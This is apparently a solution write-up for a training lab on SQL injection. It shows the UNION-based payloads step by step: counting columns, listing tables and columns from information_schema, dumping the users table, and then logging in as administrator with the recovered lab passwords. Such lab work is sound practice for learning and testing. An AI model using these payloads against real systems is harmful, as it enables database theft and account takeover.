SQL injection attack, listing the database content

SQL injection attack, listing the database contents on non-Oracle databases

Solution

Get numer of columns

' UNION SELECT NULL,NULL --

Get table_name from information_schema.tables

' UNION SELECT table_name,NULL FROM information_schema.tables--

we focus on users_gnfqea

Get column_name from information_schema.columns

' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name = 'users_gnfqea'--
we find two interesing things:
username_ktawrd
password_hqmwuu

Get password for user administrator

' UNION SELECT username_ktawrd,password_hqmwuu FROM users_gnfqea--

I found 3 users and passwords:
wiener
stku88ba15mak5imsqv1

carlos
yl1grapzz4ah7h6oixum

administrator
q936iqlaivlfamjx6mnt

Login as user: administrator

administrator
q936iqlaivlfamjx6mnt